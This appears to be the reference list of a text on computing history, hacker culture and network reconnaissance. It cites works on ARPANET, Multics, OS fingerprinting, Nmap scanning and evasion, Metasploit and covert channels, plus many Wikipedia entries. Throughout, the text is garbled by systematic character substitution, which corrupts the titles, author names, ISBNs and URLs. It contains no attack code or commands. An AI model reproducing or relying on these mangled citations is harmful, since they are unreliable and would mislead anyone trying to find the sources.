A<!AUFF7% Ar"anet ( F$e First 7nternet# $tt"%&&III.livinginternet.co &i&ii.$t A<FUA!!F7@P% F$e Art o/ Finger"rinting ( ,lides# $tt"%&& d.$udora.de&"resentations&citunderground2..5(2 BE::% Multics Peneral 7n/or ation and FAV# $tt"%&&III.bell( labs.co &$istor'&uni9&so et$ingelse.$t l CMUFA.% F$e FA(.% 7ts "ast and "resent# $tt"%&&ed(t$elen.org&co "( $ist&F$eCo "Mus<e"&FCM<(L.O.$t l C<AK%,e' our Cra'. Autor% Cra' 7nc.# $tt"%&&III.cra'.co &aboutUcra'&se' ourcra'.$t l C,C?U7@EFBA,%7nternetIor6ing Basics. Autor% Cisco ,'ste s# $tt"%&&III.cisco.co &en&2,&docs&internetIor6ing&tec$nolog'&$andboo6&7ntro(to(7nternet.$t l C2=7% Colu bia 2niversit' Co "uting =istor'# $tt"%&&III.colu bia.edu&acis&$istor'&"d"*..$t l CKBPE?% A<!A@et :ogical Ma"# $tt"%&&III.c'bergeogra"$'.org&atlas&$istorical.$t l 5EC(4EB% F$e 5EC E ulation 4eb !age# $tt"%&&III.aracnet.co &`$eal'z$&dece u.$t l EB=:%F$e =eroic =ac6er% :egends o/ t$e Co "uter Age. Autor% Eri6 Bunvand# $tt"%&&III.cs.uta$.edu&`elb&/ol6lore&a/s("a"er&a/s("a"er.$t l E<B=%=oI Fo Beco e a =ac6er. Autor% Eric ,teven <a' ond# $tt"%&&catb.org&`esr&/aqs&$ac6er( $oIto.$t l E<==%A Brie/ =istor' o/ =ac6erdo . Autor% Eric ,teven <a' ond# $tt"%&&III.tu9edo.org&`esr E<JF% F$e Jargon File# $tt"%&&catb.org&jargon& E<JF=%Fr ino M$ac6erM. Autor% Larios# Eric <a' ond# $tt"%&&III.catb.org&jargon&$t l&=&$ac6er.$t l F7@PU!A,%RnoI Kour Ene '% !assive Finger"rinting. Autor% Craig , it$# !eter Prundl # $tt"%&&"roject.$one'net.org&"a"ers&/inger& F,F% Free ,o/tIare Fundation# $tt"%&&III./s/.org& F4A:R%FireIal6ing ( A Fraceroute(:i6e Anal'sis o/ 7! !ac6et <es"onses to 5eter ine PateIa' Access Control :ists. Autor% 5avid Polds it$# Mic$ael ,c$i// an# $tt"%&&III."ac6et/actor'.net&/ireIal6&/ireIal6(/inal."d/ P@2% P@2% P@2 is not 2ni9# $tt"%&&III.gnu.org& =ACRUBA,7C,%=ac6ing% F$e Basics. Autor% Qac$ar' 4ilson# Martin !oulin# $tt"s%&&III2.sans.org&readingUroo &I$ite"a"ers&$ac6ers&055."$" =ACRUBE4%=ac6ers BeIare. Eric Cole# 2..*# 7,B@%.(+-5+(*..0(.# $tt"%&&boo6s.google.co .ar&boo6sYida/@<u2r$'d1VC =ACRUEF=7C%F$e =ac6er Et$ic and t$e ,"irit o/ t$e 7n/or ation Age. =i anen# !e66aH Forvalds# :inusH Castells# Manuel# 2..*# 7,B@%7,B@ .(-+5(5.5JJ(.# $tt"%&&III.a azon.co &=ac6er(Et$ic(!e66a(=i anen&d"&.-+55.5JJ. =ACRUEA!%=ac6ing E9"osed. ,tuart McClure# Joel ,ca bra'# Peorge Rutz# 2..5# 7,B@%0+O..+22J.O*J# $tt"%&&III.a azon.co &=ac6ing(E9"osed(5t$&d"&..+22J.O*5 =ACRU,FACR%=ac6 t$e ,tac6. Mic$ael Pregg# ,te"$en 4at6ins# Peorge Ma's# C$ris <ies# <on Bandes# Brandon Fran6lin# 2..J# 7,B@%*(50+10(*.0(O# $tt"%&&boo6s.google.co .ar&boo6sY idatU.=Kn4Cd2oC
=5U@MA!%=ost 5iscover' Iit$ n a". Autor% Mar6 4ol/gang# $tt"%&&n a".org&docs&discover'."d/ 7!U,!??F% 7! ,"oo/ing% An 7ntroduction# $tt"%&&aandrtec$.org&Fec$&@etIor6ing&@etIor6s ]2.*]2.(]2.!rog(1*2&=andouts&7!]2.,"oo/ing."d/ 7,?CU,FAF% ?//ice Ior6ers give aIa' "assIords /or a c$ea" "en# $tt"%&&III.t$eregister.co.u6&2..-&.1&*O&o//iceUIor6ersUgiveUaIa'U"assIords& 7F,UM7F%7F, ,tatus <e"ort. Autor% 5onald E. Eastla6e# /t"%&&"ublications.ai. it.edu&ai( "ublications&"d/&A7M(2-O."d/ Rern% F$e :inu9 Rernel# $tt"%&&III.6ernel.org& RMUA?5%F$e Art o/ 5ece"tion% Controlling t$e =u an Ele ent o/ ,ecurit'. Revin Mitnic6# 4illia :. ,i on# ,teve 4oznia6# 2..2# 7,B@%.(1+*(2-+*2(1# $tt"%&&boo6s.google.co .ar&boo6sYidaJ2FQMvQcVg2C :ELKU=ACR%=ac6ers% =eroes o/ t$e Co "uter <evolution.. ,teven :ev'# *0O1# 7,B@%.-O5-*2*.5# $tt"%&&III.gutenberg.org&ete9t&+20 :?PUMAPUA!!F7@P%7denti/iable Finger"rints in @etIor6 A""lications. Autor% Jason 5a ron# $tt"%&&III.useni9.org&"ublications&login&2..-(*2&"d/s&da ron."d/ MEFAU5ELP%Metas"loit -.. 5evelo"eris Puide. Autor% F$e Metas"loit ,ta//# $tt"%&&III. etas"loit.org&docu ents&develo"ersUguide."d/ MEFAUF??:%Metas"loit Fool6it. 5avid Ma'nor# R.R. Moo6$e'# Jaco"o Cervini# Fairuzan <oslan# Revin Beaver# 2..+# 7,B@%0+O(*(50+10(.+1(.# $tt"%&&III.a azon.co &Metas"loit( !enetration(5evelo" ent(Lulnerabilit'(<esearc$&d"&*50+10.+1* M2:U=7,% Multics =istor'# $tt"%&&III. ulticians.org&$istor'.$t l M2:U7@F<?% 7ntroduction and ?vervieI o/ t$e Multics ,'ste # $tt"%&&III. ulticians.org&/jcc*.$t l M2:UF7ME% Multics C$ronolog'# $tt"%&&III. ulticians.org&c$rono.$t l @MA!UF4EL%@ a" ( FireIall&75, Evasion and ,"oo/ing. Autor% n a".org# $tt"%&&n a".org& an& an(b'"ass(/ireIalls(ids.$t l @MA!U75:E% 7dle ,canning and <elated 7!75 Pa es# $tt"%&&n a".org&idlescan.$t l @MA!U@,E%@ a" ,cri"ting Engine. Autor% @ a".org# $tt"%&&n a".org&nse& @MA!U?,*%<e ote ?, detection via FC!&7! ,tac6 Finger!rinting ( First Peneration. Autor% F'odor# $tt"%&&n a".org&n a"(/inger"rinting(old.$t l @MA!U?,2%<e ote ?, 5etection using FC!&7! Finger"rinting ;2nd Peneration>. Autor% F'odor# $tt"%&&n a".org&osdetect&inde9.$t l @MA!UL,CA@%@ a" ( ,ervice and A""lication Lersion 5etection. Autor% @ a".org# $tt"%&&n a".org&vscan&inde9.$t l ?BUC<AK%?bituar' ( ,e' our Cra'# Fat$er o/ su"erco "uting. Autor% C$ris :azou# $tt"%&&III.$oise.co &"ri eur&0J&"r(0J(oct&C:(!<(*.(0J(-.$t l !5!U!:A% !5! !lanet# $tt"%&&III."d""lanet.org& !5!*.(!<M%5ECs'ste (*.# 5EC,K,FEM(2. !rocessor <e/erence Manual. 5igital Equi" ent Cor"oration# *0JO# *0+*# *0+1# *0+O# *0O2# 7,B@%# $tt"%&&"d"*..nocreI.org&docs&ad($-0*a(t*."d/ !5!*.(4eb% F$e 5EC !5!(*. E ulation 4eb"age# $tt"%&&III.aracnet.co &`$eal'z$&"d"*.e u.$t l !5!**(=BR%5igital Equi" ent Cor"oration !5!(** Manual. Autor% 5igital Equi" ent Cor"oration# $tt"%&&researc$. icroso/t.co &users&PBell&5igital&5ECMuseu .$t
!<RU10%!ort ,canning Iit$out t$e ,K@ /lag. Autor% 2riel Mai on# $tt"%&&III."$rac6.org&issues.$t lYissuea10Wida*5carticle <FCU+0-% Frans ission Control !rotocol% Functional ,"eci/ication# $tt"%&&tools.iet/.org&$t l&r/c+0-c"age(J5 <7@PU?,% <ing out t$e old# <7@P in t$e @eI% ?, Finger"rinting t$roug$ <F?s# $tt"%&&III."lanb(securit'.net&I"&ring.$t l <7@PU?,F@P%@eI Fool And Fec$nique For <e ote ?"erating ,'ste Franc6 Le'sset# ?livier Courta'# ?livier =een# $tt"%&&III.l.t-6.org&biblio&/inger"rinting&englis$&ring(/ull("a"er."d/ <?4UC?LC=%Covert C$annels in t$e FC!&7! !rotocol ,uite. Autor% Craig =. <oIland# $tt"%&&III./irst onda'.org&issues&issue2U5&roIland& ,A7:UM2,% ,A7: Co "uter =istor' E9$ibits# $tt"%&&in/olab.stan/ord.edu&"ub&vo'& useu .$t l ,A@,UAMA!%7ntrusion 5etection FAV% 4$at is AMa" and $oI does it /inger"rint a""licationsY. Autor% Antonia <ana# $tt"%&&III.sans.org&resources&id/aq&a a"."$" ,A@,UC?LC=%7ntrusion 5etection FAV% 4$at is covert c$annel and I$at are so e e9a "lesY. Autor% A an Abdulla# $tt"%&&III.sans.org&resources&id/aq&covertUc$an."$" ,A@,U,CA@<A@5%7ntrusion 5etection FAV% 4$at is ,canrandY. Autor% Mic$ael 4isener# $tt"%&&III.sans.org&resources&id/aq&scanrand."$" ,A@,UF?!*.%F$e Fen Most 7 "ortant ,ecurit' Frends o/ t$e Co ing Kear. Autor% ,A@, 7nstitute 2..J# $tt"%&&III.sans.org&resources&*.Usecurit'Utrends."d/ ,ECU!F%,ecurit' !oIer Fools. Br'an Burns# Jenni/er ,tisa Pranic6# ,teve Manzui6# !aul Puersc$# 5ave Rillion# @icolas Beauc$esne# Eric Moret# Julien ,obrier# Mic$ael :'nn# Eric Mar6$a # C$ris 7ezzoni# and !$ili""e Biondi# 2..+# 7,B@%.(50J(..0J-(*# $tt"%&&III.oreill'.co &catalog&0+O.50J..0J-2& ,ECU4A<%,ecurit' 4arrior. C'rus !ei6ari# Anton C$uva6in# 2..1# 7,B@%.(50J(..515(O# $tt"%&&III.oreill'.co &catalog&sIarrior&inde9.$t l ,@CU75:E%,ecrets o/ @etIor6 Cartogra"$'% A Co "re$ensive Puide to @ a". Ja es Messer# 2..+# 7,B@%# $tt"%&&III.netIor6u"ti e.co &n a"&inde9.s$t l ,2@U:7@R% 4$ic$ is better# static or d'na ic lin6ingY# $tt"%&&sunsite.ua6o .s6&sunIorldonline&sIol(.2(*00J&sIol(.2("er/.$t l FC!&7!U7ll%FC!&7! 7llustrated# Lol. *% F$e !rotocols. 4.<ic$ard ,tevens# *001# 7,B@%.2.*J--1J0# $tt"%&&III.6o$ala.co &start&tc"i"iv*.$t l 2@7C?<@U5EFC?@% 7ntroducing 2nicornscan# $tt"s%&&III.de/con.org&i ages&de/con(*-&dc*-( "resentations&5CU*-(:ee."d/ 2ni9-2v%A 2@7Aj ?"erating ,'ste /or t$e 5EC LAA(**&+O. Co "uter. Autor% F$o as B. :ondon# Jo$n F. <eiser# $tt"%&&III.cs.bell(labs.co &I$o&d r&ot$er"orts&-2v.$t l 47R7UB@EF% Botnet# $tt"%&&en.Ii6i"edia.org&Ii6i&Botnet 47R7UC?LC=% Covert C$annel# $tt"%&&en.Ii6i"edia.org&Ii6i&CovertUc$annel 47R7U52M!% 7n/or ation 5iving# $tt"%&&en.Ii6i"edia.org&Ii6i&7n/or ationUdiving 47R7UE@% E@7AC# $tt"%&&en.Ii6i"edia.org&Ii6i&Eniac 47R7UEA!:%E9"loit ;Co "uter ,cience>. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&E9"loitU;co "uterUscience> 47R7UFF!C% :ist o/ FF! server return codes# $tt"%&&en.Ii6i"edia.org&Ii6i&:istUo/UFF!UserverUreturnUcodes Finger"rinting. Autor%
47R7U=CC% =o ebreI Co "uter Club# $tt"%&&en.Ii6i"edia.org&Ii6i&=o ebreIUCo "uterUClub 47R7U7CM!%7nternet Control Message !rotocol ( 7CM!. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7nternetUControlUMessageU!rotocol 47R7U7!v1%7!v1 !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7!v1 47R7U7F,%7nco "atible Fi es$aring ,'ste . Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&7nco "atibleUFi es$aringU,'ste 47R7UR:?P% =ardIare 6e'logger# $tt"%&&en.Ii6i"edia.org&Ii6i&=ardIareU6e'logger 47R7U:7@% 4i6i"edia% :inu9# $tt"%&&es.Ii6i"edia.org&Ii6i&:inu9 47R7U:?CR% :oc6 !ic6ing# $tt"%&&en.Ii6i"edia.org&Ii6i&:oc6U"ic6ing 47R7U:F% :inus Forvalds# $tt"%&&en.Ii6i"edia.org&Ii6i&:inusUForvalds 47R7UM!=K% Mur"$'Ms :aIs# $tt"%&&en.Ii6i"edia.org&Ii6i&Mur"$'MsUlaI 47R7UM2:%Multics. Autor% # $tt"%&&en.Ii6i"edia.org&Ii6i&Multics 47R7U@C% netcat# $tt"%&&en.Ii6i"edia.org&Ii6i&@etcat 47R7U!5!% ,erie !5!# $tt"%&&en.Ii6i"edia.org&Ii6i&!rogra 47R7U<R7F% <oot6it# $tt"%&&en.Ii6i"edia.org&Ii6i&<oot6it 47R7U,,F% ,$oulder sur/ing# $tt"%&&en.Ii6i"edia.org&Ii6i&,$oulderUsur/ingU ]2Oco "uterUsecurit']20 47R7UFC!%FC! ( Frans ission Control !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&Frans issionUControlU!rotocol 47R7UFE:@EF% Felnet# $tt"%&&es.Ii6i"edia.org&Ii6i&Felnet 47R7UF?!,*.% # $tt"%&&en.Ii6i"edia.org&Ii6i&F?!,(*. 47R7UF<?K% Frojan $orse ;co "uting># $tt"%&&en.Ii6i"edia.org&Ii6i&FrojanU$orseU ]2Oco "uting]20 47R7UFA.%FA(.. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&FA(. 47R7U25!%25! !rotocol. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&2serU5atagra U!rotocol 47R7U24% 2ni9 4ars# $tt"%&&en.Ii6i"edia.org&Ii6i&2ni9UIars 47R7U2A% 4i6i"edia% 2ni9# $tt"%&&en.Ii6i"edia.org&Ii6i&2ni9 47R7UL7<2,% Co "uter Lirus# $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUvirus 47R7UL2:@%Lulnerabilit' ;Co "uting>. Autor% 4i6i"edia# $tt"%&&en.Ii6i"edia.org&Ii6i&Lulnerabilit'U;co "uting> 47R7U4?<M% Co "uter 4or # $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUIor 47R7UQ?MB7E% Qo bie Co "uter# $tt"%&&en.Ii6i"edia.org&Ii6i&Qo bieUco "uters A!A<C4EB% Aero9 !alo Alto <esearc$ Center# $tt"%&&III."arc.co &about&$istor'& edU5ataU!rocessor 47R7U!7P% !igg'bac6ing ;securit'># $tt"%&&en.Ii6i"edia.org&Ii6i&!igg'bac6ingU]2Osecurit']20